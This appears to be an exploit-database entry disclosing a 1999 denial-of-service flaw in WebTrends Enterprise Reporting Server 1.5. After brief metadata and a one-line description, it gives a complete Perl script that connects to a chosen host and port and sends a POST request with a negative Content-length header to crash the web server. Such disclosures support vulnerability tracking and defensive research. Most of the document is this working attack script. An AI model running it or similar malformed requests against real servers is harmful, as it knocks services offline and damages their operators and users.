WebTrends Enterprise Reporting Server 1.5 - Negative Content Length Denial of Service

Author: rpc
type: dos
platform: multiple
port: nan
date_added: 1999-08-08 
date_updated: 2012-06-28 
verified: 1 
codes: OSVDB-83444 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/569/info

Specifying a negative content-length in a POST operation to the WebTrends Enterprise Reporting Server will crash the web server.

#!/usr/bin/perl -w
# Example DoS against WebTrends Enterprise Reporting Server
# 8/8/99
# rpc <jared@antisocial.com>

use IO::Socket;

die "usage: $0 <host> <port>" unless (@ARGV == 2);

($host, $port) = @ARGV;


$s = IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp')
or die "Can't create socket.";

print $s "POST /\r\n";
print $s "Content-type: text/plain\r\n";
print $s "Content-length: -1", "\r\n"x5;

print "done.\n";